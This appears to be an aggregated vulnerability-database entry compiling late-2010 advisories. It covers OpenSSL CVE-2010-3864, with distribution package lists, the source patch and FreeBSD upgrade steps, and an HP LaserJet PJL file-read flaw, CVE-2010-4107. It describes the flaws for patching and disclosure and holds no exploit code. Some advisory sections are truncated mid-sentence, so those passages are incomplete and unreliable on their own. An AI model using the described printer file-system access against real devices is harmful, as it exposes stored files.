Size/MD5 checksum: 969104 805c95116706c82051a5d08efce729e5
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_hppa.deb
Size/MD5 checksum: 1047026 2e06d411c0a8764db3504638d3b59ef9
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_hppa.deb
Size/MD5 checksum: 1528456 de6a4129635ee4565696198ce3423674
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_hppa.udeb
Size/MD5 checksum: 634504 bab8594389626190b71ee97bfb46fa71
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_i386.deb
Size/MD5 checksum: 2108452 d75ba6c13fc77dd3eefddde480a05231
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_i386.deb
Size/MD5 checksum: 5393290 14bf0f44b8c802e47834234be834d80b
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_i386.deb
Size/MD5 checksum: 2977384 bf4c26767b006694843d036ebdca132a
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_i386.udeb
Size/MD5 checksum: 591782 bf5007e22e4bd31445458a5379086103
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_i386.deb
Size/MD5 checksum: 1035868 64085f2b106009533bda0309f08548af
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_ia64.deb
Size/MD5 checksum: 2666530 42cdae406ce22e3e538f0d744f043a39
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_ia64.deb
Size/MD5 checksum: 1465582 33c84255a9515a9a528cbf3df9398ef5
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_ia64.udeb
Size/MD5 checksum: 865352 9cbc10e393eb3d30d34ea384c6f1f9f5
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_ia64.deb
Size/MD5 checksum: 1105090 cc7485d310d4770c2b1e93c6d74dcc2b
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_ia64.deb
Size/MD5 checksum: 1280654 fde186a4983ac6cafcd3d5ec7e1d6f98
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_mips.deb
Size/MD5 checksum: 1025868 8b7f565c4c0a15b15f20f2e074bb503a
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_mips.deb
Size/MD5 checksum: 900162 391ac436c8d7ed7b55a8ea9e90c7d8be
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_mips.deb
Size/MD5 checksum: 2307960 227ac5c7b409d061222b94bc40e8cd18
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_mips.deb
Size/MD5 checksum: 1622826 8a4f73d6cd497076490404a2dade26ba
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_mips.udeb
Size/MD5 checksum: 585108 d8447df55a530959b6cd9d5d3039c0da
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_mipsel.deb
Size/MD5 checksum: 1012186 4a154b5c4d864f7dcd0bf019dfb41c5d
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_mipsel.deb
Size/MD5 checksum: 1588308 1222eb6b1870602335ef0722b7047b6a
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_mipsel.udeb
Size/MD5 checksum: 572370 a2535f616be099e9361a55637c3375d3
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_mipsel.deb
Size/MD5 checksum: 2295070 7446121759684083870d5ae0d26969c0
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_mipsel.deb
Size/MD5 checksum: 885668 3745e7c578002628f78f02bd5afeb84f
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_powerpc.deb
Size/MD5 checksum: 1643808 43814c865d098046bc1dca1920820354
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_powerpc.deb
Size/MD5 checksum: 1047060 5c45e5a5d02f856cb9dc29029d0b5557
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_powerpc.udeb
Size/MD5 checksum: 656166 309fdeebe15bbecbe8c55dbd5ddbdd3a
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_powerpc.deb
Size/MD5 checksum: 997540 f4bf73493f3964b8a23bdd424694f079
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_powerpc.deb
Size/MD5 checksum: 2251238 35f6f59b07e57eb538da19545a733d5f
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_s390.udeb
Size/MD5 checksum: 693040 26cab41169c6b8f64ce7936a2ea65a7b
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_s390.deb
Size/MD5 checksum: 1051130 f67b4fd152e1175f81022ffd345d6c78
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_s390.deb
Size/MD5 checksum: 2231782 c7796fff8c97bbf0c5ab69440cbd50f9
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_s390.deb
Size/MD5 checksum: 1602496 a9595ac98fc11015dd4bb2634416197b
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_s390.deb
Size/MD5 checksum: 1024562 ff293933ef4eb5e952659fe7caf82c8b
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny9_sparc.deb
Size/MD5 checksum: 2290536 e5c655fbcc524fe7bb56945cc8b2f5d1
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny9_sparc.deb
Size/MD5 checksum: 3868850 b9cbaa2cbb2cfa4aa1dce984148dba4b
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny9_sparc.deb
Size/MD5 checksum: 2146488 d0c17736c2b26a97491e34321ffff3f5
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny9_sparc.udeb
Size/MD5 checksum: 580510 28ab74855c8a34bb002b44fd7ecb8997
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny9_sparc.deb
Size/MD5 checksum: 1043044 d78ffaf44d1177b05fa0cfb02d76128a
These files will probably be moved into the stable distribution on
its next update.
Packages for 2009.0 are provided as of the Extended Maintenance
Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490
The updated packages have been patched to correct this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864
http://openssl.org/news/secadv_20101116.txt
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2009.0:
b32e4b6e6b901d72fe4aa24bd0f41f9b 2009.0/i586/libopenssl0.9.8-0.9.8h-3.8mdv2009.0.i586.rpm
f55512826ad63a1c9c4b60fad54292ac 2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.8mdv2009.0.i586.rpm
eb005af48a71b807ef387f4c54eedd6f 2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.8mdv2009.0.i586.rpm
ed01c1d0ea3fdecc8ba3331541d18d9a 2009.0/i586/openssl-0.9.8h-3.8mdv2009.0.i586.rpm
a5b43d482e633af8952e7e04f8d7b56e 2009.0/SRPMS/openssl-0.9.8h-3.8mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64:
007dedca099e812b7b461e720ef5e6f1 2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.8mdv2009.0.x86_64.rpm
293194a028c940a27d11549ef84ff182 2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.8mdv2009.0.x86_64.rpm
6b1c8ced8640b51bf25761c127b3ed20 2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.8mdv2009.0.x86_64.rpm
76bbe5d36d9887cbc753b267b6d3a608 2009.0/x86_64/openssl-0.9.8h-3.8mdv2009.0.x86_64.rpm
a5b43d482e633af8952e7e04f8d7b56e 2009.0/SRPMS/openssl-0.9.8h-3.8mdv2009.0.src.rpm
Mandriva Linux 2010.0:
b92acd82153b8987f0bcdb0e277c6f0e 2010.0/i586/libopenssl0.9.8-0.9.8k-5.3mdv2010.0.i586.rpm
d780ab4e0e80a66b105f72e41a4d5b54 2010.0/i586/libopenssl0.9.8-devel-0.9.8k-5.3mdv2010.0.i586.rpm
8faae39210b0c366f619cdb71b1a7321 2010.0/i586/libopenssl0.9.8-static-devel-0.9.8k-5.3mdv2010.0.i586.rpm
2247e3b7bff72998d841d650ba25960a 2010.0/i586/openssl-0.9.8k-5.3mdv2010.0.i586.rpm
2c2a297e1c568ef69502064578516f0f 2010.0/SRPMS/openssl-0.9.8k-5.3mdv2010.0.src.rpm
Mandriva Linux 2010.0/X86_64:
331d3064412c7b73baed5d54e7262f51 2010.0/x86_64/lib64openssl0.9.8-0.9.8k-5.3mdv2010.0.x86_64.rpm
2e90f43a521e108a8adbde35a058d7b9 2010.0/x86_64/lib64openssl0.9.8-devel-0.9.8k-5.3mdv2010.0.x86_64.rpm
7d102f6bf8bb201654aa518e3b73a27f 2010.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8k-5.3mdv2010.0.x86_64.rpm
4b7ad813fd5fdd5785bd94eb3a951244 2010.0/x86_64/openssl-0.9.8k-5.3mdv2010.0.x86_64.rpm
2c2a297e1c568ef69502064578516f0f 2010.0/SRPMS/openssl-0.9.8k-5.3mdv2010.0.src.rpm
Mandriva Linux 2010.1:
8310ac6aa860087de6992e618460f279 2010.1/i586/libopenssl1.0.0-1.0.0a-1.5mdv2010.1.i586.rpm
7e7719b1b5c2f91a6eadfab9dd696b8f 2010.1/i586/libopenssl1.0.0-devel-1.0.0a-1.5mdv2010.1.i586.rpm
5b5aa8939c69c69c2ab49145aca37173 2010.1/i586/libopenssl1.0.0-static-devel-1.0.0a-1.5mdv2010.1.i586.rpm
0e6bd59c1d6b2c459acc5c4d0851246a 2010.1/i586/libopenssl-engines1.0.0-1.0.0a-1.5mdv2010.1.i586.rpm
de46046e9b1e033cccd668b32b70972c 2010.1/i586/openssl-1.0.0a-1.5mdv2010.1.i586.rpm
f6059c72297b6510fa4c816db6742a64 2010.1/SRPMS/openssl-1.0.0a-1.5mdv2010.1.src.rpm
Mandriva Linux 2010.1/X86_64:
c792f3d19c1f9ff50c801feccd600319 2010.1/x86_64/lib64openssl1.0.0-1.0.0a-1.5mdv2010.1.x86_64.rpm
7f3a6b125fc145e17c140218f3b48a92 2010.1/x86_64/lib64openssl1.0.0-devel-1.0.0a-1.5mdv2010.1.x86_64.rpm
e5f35fbeadb2f765607325f960de621e 2010.1/x86_64/lib64openssl1.0.0-static-devel-1.0.0a-1.5mdv2010.1.x86_64.rpm
27a8dee6459e0830be1e907f082d25a2 2010.1/x86_64/lib64openssl-engines1.0.0-1.0.0a-1.5mdv2010.1.x86_64.rpm
4b7863a6c8b883f385613bb7a49af128 2010.1/x86_64/openssl-1.0.0a-1.5mdv2010.1.x86_64.rpm
f6059c72297b6510fa4c816db6742a64 2010.1/SRPMS/openssl-1.0.0a-1.5mdv2010.1.src.rpm
Mandriva Enterprise Server 5:
fef62b69a582a93e821a2d802fb4faee mes5/i586/libopenssl0.9.8-0.9.8h-3.8mdvmes5.1.i586.rpm
fe3c0cf3596d90cc3be37a944df1753b mes5/i586/libopenssl0.9.8-devel-0.9.8h-3.8mdvmes5.1.i586.rpm
d5a269adf63ee6d4ce21ea651e208180 mes5/i586/libopenssl0.9.8-static-devel-0.9.8h-3.8mdvmes5.1.i586.rpm
e410f94c6d8c08270aa1edd5aeb7c177 mes5/i586/openssl-0.9.8h-3.8mdvmes5.1.i586.rpm
aaa38cecee165e165beace7e0b02ecdf mes5/SRPMS/openssl-0.9.8h-3.8mdvmes5.1.src.rpm
Mandriva Enterprise Server 5/X86_64:
ebec7b3044ee3b3b0ab6c455741e5782 mes5/x86_64/lib64openssl0.9.8-0.9.8h-3.8mdvmes5.1.x86_64.rpm
0c201edd531dd53a541739bf6db7f276 mes5/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.8mdvmes5.1.x86_64.rpm
83a690e504f6470ffc4bce428ff09199 mes5/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.8mdvmes5.1.x86_64.rpm
fcef579e52e20393ffd2bbae00b602a8 mes5/x86_64/openssl-0.9.8h-3.8mdvmes5.1.x86_64.rpm
aaa38cecee165e165beace7e0b02ecdf mes5/SRPMS/openssl-0.9.8h-3.8mdvmes5.1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFM49pvmqjQ0CJFipgRAs5xAKDhGJdpzq9ZF6TvhezjZR8zmOQAngCggDa1
vAfiUtuiMqw0BDS3V2tLk/I=
=hDGj
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
The fix was developed by Dr Stephen Henson of the OpenSSL core team.
This vulnerability is tracked as CVE-2010-3864
Who is affected?
=================
All versions of OpenSSL supporting TLS extensions contain this vulnerability
including OpenSSL 0.9.8f through 0.9.8o, 1.0.0, 1.0.0a releases.
Patch for OpenSSL 0.9.8 releases
================================
Index: ssl/t1_lib.c
===================================================================
RCS file: /v/openssl/cvs/openssl/ssl/t1_lib.c,v
retrieving revision 1.13.2.27
diff -u -r1.13.2.27 t1_lib.c
--- ssl/t1_lib.c 12 Jun 2010 13:18:58 -0000 1.13.2.27
+++ ssl/t1_lib.c 15 Nov 2010 15:20:14 -0000
@@ -432,14 +432,23 @@
switch (servname_type)
{
case TLSEXT_NAMETYPE_host_name:
- if (s->session->tlsext_hostname == NULL)
+ if (!s->hit)
{
- if (len > TLSEXT_MAXLEN_host_name ||
- ((s->session->tlsext_hostname = OPENSSL_malloc(len+1)) == NULL))
+ if(s->session->tlsext_hostname)
+ {
+ *al = SSL_AD_DECODE_ERROR;
+ return 0;
+ }
+ if (len > TLSEXT_MAXLEN_host_name)
{
*al = TLS1_AD_UNRECOGNIZED_NAME;
return 0;
}
+ if ((s->session->tlsext_hostname = OPENSSL_malloc(len+1)) == NULL)
+ {
+ *al = TLS1_AD_INTERNAL_ERROR;
+ return 0;
+ }
memcpy(s->session->tlsext_hostname, sdata, len);
s->session->tlsext_hostname[len]='\0';
if (strlen(s->session->tlsext_hostname) != len) {
@@ -452,7 +461,8 @@
}
else
- s->servername_done = strlen(s->session->tlsext_hostname) == len
+ s->servername_done = s->session->tlsext_hostname
+ && strlen(s->session->tlsext_hostname) == len
&& strncmp(s->session->tlsext_hostname, (char *)sdata, len) == 0;
break;
Patch for OpenSSL 1.0.0 releases
================================
Index: ssl/t1_lib.c
===================================================================
RCS file: /v/openssl/cvs/openssl/ssl/t1_lib.c,v
retrieving revision 1.64.2.14
diff -u -r1.64.2.14 t1_lib.c
--- ssl/t1_lib.c 15 Jun 2010 17:25:15 -0000 1.64.2.14
+++ ssl/t1_lib.c 15 Nov 2010 15:26:19 -0000
@@ -714,14 +714,23 @@
switch (servname_type)
{
case TLSEXT_NAMETYPE_host_name:
- if (s->session->tlsext_hostname == NULL)
+ if (!s->hit)
{
- if (len > TLSEXT_MAXLEN_host_name ||
- ((s->session->tlsext_hostname = OPENSSL_malloc(len+1)) == NULL))
+ if(s->session->tlsext_hostname)
+ {
+ *al = SSL_AD_DECODE_ERROR;
+ return 0;
+ }
+ if (len > TLSEXT_MAXLEN_host_name)
{
*al = TLS1_AD_UNRECOGNIZED_NAME;
return 0;
}
+ if ((s->session->tlsext_hostname = OPENSSL_malloc(len+1)) == NULL)
+ {
+ *al = TLS1_AD_INTERNAL_ERROR;
+ return 0;
+ }
memcpy(s->session->tlsext_hostname, sdata, len);
s->session->tlsext_hostname[len]='\0';
if (strlen(s->session->tlsext_hostname) != len) {
@@ -734,7 +743,8 @@
}
else
- s->servername_done = strlen(s->session->tlsext_hostname) == len
+ s->servername_done = s->session->tlsext_hostname
+ && strlen(s->session->tlsext_hostname) == len
&& strncmp(s->session->tlsext_hostname, (char *)sdata, len) == 0;
break;
@@ -765,15 +775,22 @@
*al = TLS1_AD_DECODE_ERROR;
return 0;
}
- s->session->tlsext_ecpointformatlist_length = 0;
- if (s->session->tlsext_ecpointformatlist != NULL) OPENSSL_free(s->session->tlsext_ecpointformatlist);
- if ((s->session->tlsext_ecpointformatlist = OPENSSL_malloc(ecpointformatlist_length)) == NULL)
+ if (!s->hit)
{
- *al = TLS1_AD_INTERNAL_ERROR;
- return 0;
+ if(s->session->tlsext_ecpointformatlist)
+ {
+ *al = TLS1_AD_DECODE_ERROR;
+ return 0;
+ }
+ s->session->tlsext_ecpointformatlist_length = 0;
+ if ((s->session->tlsext_ecpointformatlist = OPENSSL_malloc(ecpointformatlist_length)) == NULL)
+ {
+ *al = TLS1_AD_INTERNAL_ERROR;
+ return 0;
+ }
+ s->session->tlsext_ecpointformatlist_length = ecpointformatlist_length;
+ memcpy(s->session->tlsext_ecpointformatlist, sdata, ecpointformatlist_length);
}
- s->session->tlsext_ecpointformatlist_length = ecpointformatlist_length;
- memcpy(s->session->tlsext_ecpointformatlist, sdata, ecpointformatlist_length);
#if 0
fprintf(stderr,"ssl_parse_clienthello_tlsext s->session->tlsext_ecpointformatlist (length=%i) ", s->session->tlsext_ecpointformatlist_length);
sdata = s->session->tlsext_ecpointformatlist;
@@ -794,15 +811,22 @@
*al = TLS1_AD_DECODE_ERROR;
return 0;
}
- s->session->tlsext_ellipticcurvelist_length = 0;
- if (s->session->tlsext_ellipticcurvelist != NULL) OPENSSL_free(s->session->tlsext_ellipticcurvelist);
- if ((s->session->tlsext_ellipticcurvelist = OPENSSL_malloc(ellipticcurvelist_length)) == NULL)
+ if (!s->hit)
{
- *al = TLS1_AD_INTERNAL_ERROR;
- return 0;
+ if(s->session->tlsext_ellipticcurvelist)
+ {
+ *al = TLS1_AD_DECODE_ERROR;
+ return 0;
+ }
+ s->session->tlsext_ellipticcurvelist_length = 0;
+ if ((s->session->tlsext_ellipticcurvelist = OPENSSL_malloc(ellipticcurvelist_length)) == NULL)
+ {
+ *al = TLS1_AD_INTERNAL_ERROR;
+ return 0;
+ }
+ s->session->tlsext_ellipticcurvelist_length = ellipticcurvelist_length;
+ memcpy(s->session->tlsext_ellipticcurvelist, sdata, ellipticcurvelist_length);
}
- s->session->tlsext_ellipticcurvelist_length = ellipticcurvelist_length;
- memcpy(s->session->tlsext_ellipticcurvelist, sdata, ellipticcurvelist_length);
#if 0
fprintf(stderr,"ssl_parse_clienthello_tlsext s->session->tlsext_ellipticcurvelist (length=%i) ", s->session->tlsext_ellipticcurvelist_length);
sdata = s->session->tlsext_ellipticcurvelist;
References
===========
URL for this Security Advisory:
http://www.openssl.org/news/secadv_20101116.txt
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=============================================================================
FreeBSD-SA-10:10.openssl Security Advisory
The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib
Module: openssl
Announced: 2010-11-29
Credits: Georgi Guninski, Rob Hulswit
Affects: FreeBSD 7.0 and later
Corrected: 2010-11-26 22:50:58 UTC (RELENG_8, 8.1-STABLE)
2010-11-29 20:43:06 UTC (RELENG_8_1, 8.1-RELEASE-p2)
2010-11-29 20:43:06 UTC (RELENG_8_0, 8.0-RELEASE-p6)
2010-11-28 13:45:51 UTC (RELENG_7, 7.3-STABLE)
2010-11-29 20:43:06 UTC (RELENG_7_3, 7.3-RELEASE-p4)
2010-11-29 20:43:06 UTC (RELENG_7_1, 7.1-RELEASE-p16)
CVE Name: CVE-2010-2939, CVE-2010-3864
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.
II. The race condition can lead to
a buffer overflow. [CVE-2010-3864]
A double free exists in the SSL client ECDH handling code, when
processing specially crafted public keys with invalid prime
numbers. [CVE-2010-2939]
III. [CVE-2010-3864].
It may be possible to cause a DoS or potentially execute arbitrary in
the context of the user connection to a malicious SSL server.
[CVE-2010-2939]
IV. Workaround
No workaround is available, but CVE-2010-3864 only affects FreeBSD 8.0
and later. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the
RELENG_8_1, RELENG_8_0, RELENG_7_3, or RELENG_7_1 security branch
dated after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to FreeBSD 7.1, 7.3,
8.0 and 8.1 systems.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl7.patch.asc
[FreeBSD 8.x]
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch
# fetch http://security.FreeBSD.org/patches/SA-10:10/openssl.patch.asc
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/secure/lib/libssl
# make obj && make depend && make && make install
NOTE: On the amd64 platform, the above procedure will not update the
lib32 (i386 compatibility) libraries. On amd64 systems where the i386
compatibility libraries are used, the operating system should instead
be recompiled as described in
<URL:http://www.FreeBSD.org/handbook/makeworld.html>
3) To update your vulnerable system via a binary patch:
Systems running 7.1-RELEASE, 7.3-RELEASE, 8.0-RELEASE or 8.1-RELEASE
on the i386 or amd64 platforms can be updated via the
freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
VI. Correction details
The following list contains the revision numbers of each file that was
corrected in FreeBSD.
CVS:
Branch Revision
Path
- -------------------------------------------------------------------------
RELENG_7_3
src/UPDATING 1.507.2.34.2.6
src/sys/conf/newvers.sh 1.72.2.16.2.8
src/crypto/openssl/ssl/s3_clnt.c 1.1.1.14.2.1.4.1
RELENG_7_1
src/UPDATING 1.507.2.13.2.19
src/sys/conf/newvers.sh 1.72.2.9.2.20
src/crypto/openssl/ssl/s3_clnt.c 1.1.1.14.6.2
RELENG_8_1
src/UPDATING 1.632.2.14.2.5
src/sys/conf/newvers.sh 1.83.2.10.2.6
src/crypto/openssl/ssl/s3_clnt.c 1.3.2.1.2.1
src/crypto/openssl/ssl/t1_lib.c 1.2.2.1.2.1
RELENG_8_0
src/UPDATING 1.632.2.7.2.9
src/sys/conf/newvers.sh 1.83.2.6.2.9
src/crypto/openssl/ssl/s3_clnt.c 1.3.4.1
src/crypto/openssl/ssl/t1_lib.c 1.2.4.1
- -------------------------------------------------------------------------
Subversion:
Branch/path Revision
- -------------------------------------------------------------------------
stable/7/ r215997
releng/7.3/ r216063
releng/7.1/ r216063
stable/8/ r215912
releng/8.0/ r216063
releng/8.1/ r216063
- -------------------------------------------------------------------------
VII
| VAR-201011-0192 | CVE-2010-4107 |
plural HP Used in printer products File System External Access Setting PJL Access value Arbitrary file read vulnerability in default settings
Related entries in the VARIoT exploits database: VAR-E-201011-0051, VAR-E-201011-0053, VAR-E-201011-0052, VAR-E-201011-0050 |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The default configuration of the PJL Access value in the File System External Access settings on HP LaserJet MFP printers, Color LaserJet MFP printers, and LaserJet 4100, 4200, 4300, 5100, 8150, and 9000 printers enables PJL commands that use the device's filesystem, which allows remote attackers to read arbitrary files via a command inside a print job, as demonstrated by a directory traversal attack. HP LaserJet Printers is a line of laser printers from Hewlett Packard. The affected printer products are as follows: * HP LaserJet MFP printers (all supported print job language (PJL) models).* HP Color LaserJet MFP printers (all supported print job language (PJL) models).* HP LaserJet 4100, 4200 , 4300, 5100, 8150 and 9000 series. Multiple HP printers are prone to a directory-traversal vulnerability because the devices' webserver fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
HP LaserJet Printers PJL Directory Traversal Vulnerability
SECUNIA ADVISORY ID:
SA42238
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42238/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42238
RELEASE DATE:
2010-11-17
DISCUSS ADVISORY:
http://secunia.com/advisories/42238/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42238/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42238
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in HP LaserJet Printers, which can
be exploited by malicious people to disclose potentially sensitive
information.
SOLUTION:
Apply the workaround (please see the vendor's advisory for details).
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Moritz Jodeit, n.runs AG.
ORIGINAL ADVISORY:
HPSBPI02575 SSRT090255:
https://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02004333
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. The vulnerability could be exploited remotely to gain unauthorized access to files.
References: CVE-2010-4107
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The vulnerability can be avoided by either one of the following actions:
disable file system access via the PJL interface
set a PJL password
These recommendations are documented in the "HP Imaging and Printing Security Best Practices - Configuring Security for Multiple LaserJet MFPs and Color LaserJet MFPs" manual, available here:
http://h20000.www2.hp.com/bc/docs/support/SupportManual/c01707469/c01707469.pdf?jumpid=reg_R1002_USEN
PRODUCT SPECIFIC INFORMATION
None
HISTORY
Version:1 (rev.1) - 15 November 2010 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
